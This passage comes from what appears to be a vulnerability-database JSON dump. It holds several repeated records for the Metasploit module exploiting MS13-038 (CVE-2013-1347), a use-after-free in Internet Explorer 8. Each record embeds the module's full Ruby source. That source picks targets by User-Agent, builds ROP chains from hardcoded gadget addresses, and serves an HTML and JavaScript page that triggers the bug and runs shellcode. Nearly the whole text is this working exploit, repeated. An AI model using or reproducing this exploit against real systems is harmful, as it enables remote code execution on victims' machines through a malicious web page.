unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-09T13:23:04", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-09T15:19:47", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-09T15:19:47", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-09T23:18:06", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-09T23:18:06", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-10T01:30:47", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-10T01:30:47", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-10T03:31:40", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 